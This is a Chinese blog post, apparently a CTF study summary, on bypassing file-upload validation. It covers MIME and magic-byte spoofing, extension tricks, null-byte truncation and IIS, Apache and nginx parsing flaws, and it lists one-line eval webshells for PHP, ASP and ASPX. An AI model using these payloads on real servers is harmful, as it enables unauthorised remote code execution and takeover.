文件上传的各种绕过姿势

最新推荐文章于 2024-07-21 14:30:49 发布
最新推荐文章于 2024-07-21 14:30:49 发布
阅读量1.6k 收藏 12
点赞数
分类专栏: 知识点学习 文章标签: 文件上传漏洞
原文链接:https://wenku.baidu.com/view/bf350a1fbc64783e0912a21614791711cc79799c.html
版权

文件上传绕过学习

做 ctf 的 web 方向常常遇到文件上传的题目,而且每题多少会有些不同。
于是搜集一番总结起来学习一下。

文件上传的校验

  • 客户端 JavaScript 校验
    一般在 F12 源代码中可以看到,校验的是文件后缀名。

  • 服务端校验
    1)文件头 content-type 字段校验(image/jpeg)
    2)文件内容头的校验。
    3)后缀名黑名单校验。
    4)后缀名白名单校验。
    5)自定义正则校验。

  • WAF设备校验

——

文件上传校验的绕过

客户端绕过

前端会检测后缀,可以先上传一个符合后缀的文件,再用 burp 抓包修改文件的内容以及后缀即可。

——

服务端绕过

  • 1)文件类型绕过
    用 burp 抓包,修改 content-type 字段为 image/jpeg 。

  • 2)文件头绕过
    在正常的一句话木马前面加上一些文件信息。 如 gif 的文件幻数:

GIF89a
<?php @eval($_GET['a']) ?>
  • 3)文件后缀名绕过
    服务端会对文件后缀进行黑名单校验。
    则找黑名单扩展名的漏网之鱼:

jsp:jspx、jspf; asp:asa、cer、aspx;
php:php,php3,php4,php5,php7,phtml,pht,phps

可能存在大小写绕过,如:aSp、pHp 。

  • 4)配合操作系统文件命令规则
    上传不符合 Windows 文件命名规则的文件名:

test.asp
test.asp(空格)
text.php:1.jpg
text.php:: D A T A s h e l l . p h p : : DATA shell.php:: DATAshell.php::DATA……

Linux 下后缀名大小写

  • 5)配合其他规则
    0x00截断:基于一个组合逻辑漏洞造成的,通常存在于构造上传文件路径的时候。test.php(0x00).jpg、test.php%00.jpg。
    例如: 路径/upload/1.php(0x00),文件名1.jpg,结合/upload/1.php(0x00)/1.jpg

  • 6)配合文件包含漏洞
    前提:校验规则只校验当文件后缀名为 asp/php/jsp 的文件内容是否为木马。 先上传一个内容为一句话木马的 .txt 文件,后缀正常未被检测并且上传成功;
    再上传一个 .php 文件,内容为 <?php Include("刚刚上传的 .txt 文件路径"); ?>
    此时,这个 php 文件就会去引用 txt 文件的内容,从而绕过校验。

中引用文件内容的语法:

#PHP <?php Include("上传的txt文件路径"); ?>
#ASP
#JSP <jsp:include page=“上传的txt文件路径”/> or <%include file=“上传的txt文件路径”%>

——
——

服务器解析漏洞

IIS5.x-6.x解析漏洞

目录解析(6.0)
形式:www.xxx.com/xx.asp/xx.jpg
原理: 服务器默认会把.asp,.asa目录下的文件都解析成asp文件。

文件解析
形式:www.xxx.com/xx.asp;.jpg 原理:服务器默认不解析;号后面的内容,因此xx.asp;.jpg便被解析成asp文件了。

解析文件类型
IIS6.0 默认的可执行文件除了asp还包含这三种 : /test.asa /test.cer /test.cdx

——
——

apache解析漏洞

Apache 解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析,就再往左判断。比如 test.php.owf.rar “.owf”和”.rar” 这两种后缀是apache不可识别解析,apache就会把wooyun.php.owf.rar解析成php。

——
——

nginx解析漏洞

漏洞形式
www.xxxx.com/UploadFiles/image/1.jpg/1.php
www.xxxx.com/UploadFiles/image/1.jpg%00.php
www.xxxx.com/UploadFiles/image/1.jpg/%20\0.php
另外一种手法:上传一个名字为test.jpg,以下内容的文件。

<?PHPfputs(fopen('shell.php','w'),'<?phpeval($_POST[cmd])?>');?>

然后访问test.jpg/.php,在这个目录下就会生成一句话木马shell.php。

转自
https://wenku.baidu.com/view/bf350a1fbc64783e0912a21614791711cc79799c.html

关于上传文件里的内容,即一句话木马
最简单的一句话木马:

<?php @eval($_POST['aa']) ?>

php的代码要写在<?php ?>里面,服务器才能认出来这是php代码,然后才去解析。

@符号的意思是不报错,即使执行错误,也不报错,如果没有@,就会报错。

eval 就是执行命令的函数,把字符串作为 PHP 代码执行。

eval() 语言结果是非常危险的,因为它允许执行任意 PHP 代码。

常见的一句话木马:

php的一句话木马: <?php @eval($_POST['pass']);?>
asp的一句话是:   <%eval request ("pass")%>
aspx的一句话是:  <%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>

一句话木马的内容中 <?php 被过滤了,还可以换为如下内容:

<script language="php">
@eval($_POST['hacker']);
</script>
Goodric
关注
专栏目录
文件上传绕过的多种姿势
qq_32445755的博客
04-19 504
此文件可以实现:文件夹密码保护、用户自动重定向、自定义错误页面、改变文件扩展名、封禁特定ip地址的用户、只允许特定ip地址用户、禁止目录列表,以及使用其他文件作为index文件等功能。上传黑名单以外的后缀名,在iis里asp禁止上传了,可以上传asa、cer、cdx这些后缀,如果网站允许.net执行,可以上传ashx代替aspx。#如果目录存在,我们将把它公开,这样我们就可以定义在其中运行shell所需的服务器函数#“如上所示,我们可以首先导航到属于SmarterMail服务的App_Data目录,”
html文件上传漏洞,文件上传漏洞绕过姿势
weixin_31857829的博客
06-07 1476
文件上传漏洞可以说是日常渗透测试用得最多的一个漏洞,因为用它获得服务器权限最快最直接。但是想真正把这个漏洞利用好却不那么容易,其中有很多技巧,也有很多需要掌握的知识。俗话说,知己知彼方能百战不殆,因此想要研究怎么防护漏洞,就要了解怎么去利用。此篇文章主要分三部分:总结一些常见的上传文件校验方式,以及绕过校验的各种姿势,最后对此漏洞提几点防护建议。(根据个人经验总结,欢迎补充纠错~~)文件上传校验姿...
上传验证绕过全解析
weixin_33941350的博客
04-19 677
目录 0x01 客户端验证绕过(javascript 扩展名检测)0x02 服务端验证绕过(http request 包检测) - Content-type (Mime type) 检测 0x03 服务端验证绕过(扩展名检测) - 黑名单检测 - 白名单检测 - .htaccess 文件攻击 0x04 服务端验证绕过(文件完整性检测) ...
CTF文件上传题目整理总结
热门推荐
xiaotaode2012的专栏
08-16 1万+
0X00说在前面的话 CTF中或多或少都有点文件上传的题目,而这个又是最好整理的,变化的方式不是很多(至少到目前为止我没有发现太多的姿势。。。。),随意就先整理这个吧。 0x01文件上传绕过的主要姿势有: A:基于前台JS的验证,这个 不要说就是firebug下修改一下JS文件就绕过了 B:基于文件后缀名的绕过,这里面的主要姿势有:利用后缀名大小写混用绕过、空格或者
CTF-文件上传(文件包含)总结
最新发布
2302_78903258的博客
07-21 1541
攻击者在入侵了一个网站后,通常会将这些asp或php后门文件与网站服务器web目录下正常的网页文件混在一起,然后使用浏览器来访问这些后门,得到一个命令执行环境,以达到控制网站服务器的目的(可以上传下载或者修改文件,操作数据库,执行任意命令等)。php的文件包含机制是将已经包含的文件与文件的真实路径放进哈希表中,正常情况下,PHP会将用户输入的文件名进行resolve,转换成标准的绝对路径,这个转换的过程会将…来实现的,它会检查左侧的表达式是否为 null,如果是则使用右侧的默认值。以及 fd 怎么办呢?
文件上传绕过姿势
qq_35405259的博客
05-09 164
文件上传绕过各种姿势
Fuzz
08-19 1万+
0x01、漏洞简介 文件上传,顾名思义就是上传文件的功能行为,之所以会被发展为危害严重的漏洞,是程序没有对访客提交的数据进行检验或者过滤不严,可以直接提交修改过的数据绕过扩展名的检验。文件上传漏洞漏洞中最为简单猖獗的利用形式,一般只要能上传获取地址,可执行文件被解析就可以获取系统WebShell。 0x02、漏洞原理 ​ 网站WEB应用都有一些文件上传功能,比如文档、图片、头像、视频上传,当上传功能的实现代码没有严格校验上传文件的后缀和文件类型时,就可以上传任意文件甚至是可执行文件后门。 0x03、漏洞
2022年文件上传漏洞绕过姿势整理,过waf版
11-20
2022年文件上传漏洞绕过姿势整理,过waf版,绕过思路:对文件的内容,数据。数据包进行处理。2.通过替换大小写来进行绕过
上传绕过WAF的15中姿势
06-29
这是一篇围绕如何绕过Web应用防火墙(WAF)进行文件上传的技术文章,旨在帮助安全研究人员和技术人员了解当前绕过技术,并采取相应的防御措施。 ### 一、默认状态 这是最基础的状态,没有对请求头或文件名进行任何...
文件上传绕过姿势补充
ITgougou_的博客
12-02 195
绕过姿势 客户端绕过(抓包改包) • 服务端绕过 • 文件类型 • 文件头 • 文件后缀名 • 配合文件包含漏洞绕过 • 配合服务器解析漏洞绕过 • CMS、编辑器漏洞绕过 • 配合操作系统文件命名规则绕过 这里只针对自己不太熟悉和使用的一些姿势进行解释。 1. 通过服务器解析 针对早期版本安全狗,可以多加一个filename 或者将filename换位置,在IIS6.0下如果我们将filename放在如下位置 2.配合文件包含漏洞 前提:校验规则只校验当文件后缀名...
文件上传绕过的各种姿势
weixin_50464560的博客
08-05 316
先来介绍下文件上传漏洞 一. 什么是文件上传漏洞 Web应用程序通常会有文件上传的功能, 例如在 BBS发布图片 , 在个人网站发布ZIP 压缩 包, 在办公平台发布DOC文件等 , 只要 Web应用程序允许上传文件, 就有可能存在文件上传漏洞 二.什么样的网站会有文件上传漏洞 大部分文件上传漏洞的产生是因为Web应用程序没有对上传文件的格式进行严格过滤 , 还有一部分是攻击者通过Web服务器的解析漏洞来突破Web应用程序的防护, 后面我们会讲 到一些常见的解析漏洞, 最...
各种文件上传绕过姿势(一)
weixin_48017707的博客
10-20 355
各种文件上传绕过姿势 **目录**各种文件上传绕过姿势写在前面一、前端绕过1.1 防护手段1.2 绕过方法二、检查MIME类型2.1 防护手段2.2 绕过方法三、黑名单绕过3.1 防护手段3.2绕过方法 写在前面 作为一名信息安全行业的信安小白,本人也不胜荣幸参加了几次HW,经过系统的学习并接触过各种漏洞之后,我发现文件上传漏洞被利用的可能性还是很大的,大多数网站都存在文件上传的途径,至于能不能利用这个途径并获取重要信息或者拿到权限之类的话,还是要看网站管理员对于这个可能存在漏洞的地方的加固措施了。而今天我
Getshell | 文件上传绕过整理
重新启程
11-07 809
WAF绕过 安全狗绕过 1.绕过思路:对文件的内容,数据。数据包进行处理。 关键点在这里Content-Disposition: form-data; name="file"; filename="ian.php" 将form-data; 修改为~form-data; 2.通过替换大小写来进行绕过 Content-Disposition: form-dat...
文件上传绕过姿势总结
飞鱼的企鹅的博客
07-21 932
为什么有文件上传漏洞上传文件时,如果服务器端没有对客户端上传的文件作严格的过滤和验证,就可以造成任意文件上传漏洞上传的脚本文件包括(asp,aspx,php,jsp等) 绕过 前端检测绕过 如果控制文件上传的地方只有简单的前端验证,就是上传的文件后缀名不符合要求,那么就可以先上传一个符合条件的名称,内容是一句话木马,然后抓包,把后缀改成php或其他的 还有一种js验证,我们可以先把当前网站...
文件上传绕过方法
qq_47177909的博客
10-22 3479
简介 文件上传漏洞是指由于程序员在对用户文件上传部分的控制不足或者处理缺陷,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。 这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。 这种攻击方式是最为直接和有效的,“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。 常用的文件上传手段 案例 环境下载链接:https://pan.baidu.com/s/1PhCS78Nu_ZKrlnNMBxERaQ 提取码:wjsc 1、通过禁用js绕过检查,进行文
文件上传常用绕过方式
weixin_43077878的博客
04-02 3350
1.前端。
文件上传检测的多种绕过姿势
资料汇总整理-仅供个人学习使用
11-25 1326
服务器安全知识
9.文件上传漏洞绕过方式
05-15
文件上传漏洞是指攻击者通过上传恶意文件的方式,绕过应用程序的安全机制,将恶意文件上传到服务器上,从而实现攻击目的。常见的文件上传漏洞绕过方式包括以下几种: 1. 修改文件类型:攻击者可以修改上传文件的文件类型,将恶意文件伪装成常见文件类型,绕过检测机制。 2. 绕过文件类型检测:上传文件时,应用程序会检测文件类型,如果上传的文件类型不符合要求,则会拒绝上传。攻击者可以通过修改 HTTP 头部信息或者使用特殊字符等方式,绕过文件类型检测。 3. 绕过文件大小限制:应用程序通常会限制上传文件的大小,攻击者可以通过分割文件、压缩文件等方式,绕过文件大小限制。 4. 绕过文件路径检测:应用程序会检测上传文件的路径,如果路径不符合要求,则会拒绝上传。攻击者可以通过构造特殊的路径,绕过文件路径检测。 5. 绕过文件名检测:应用程序会检测上传文件的文件名,如果文件名不符合要求,则会拒绝上传。攻击者可以通过构造特殊的文件名,绕过文件名检测。 为了避免文件上传漏洞的攻击,应用程序开发人员可以采取以下措施: 1. 对上传文件进行严格的类型、大小、路径、文件名检测,确保上传的文件符合要求。 2. 对上传文件进行病毒扫描和安全检测,确保上传的文件不包含恶意代码。 3. 限制上传文件的存储路径,确保上传的文件不会对系统造成危害。 4. 对上传文件进行权限控制,确保只有授权的用户才能访问上传的文件。 5. 定期更新应用程序和服务器的安全补丁,确保系统处于最新的安全状态。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值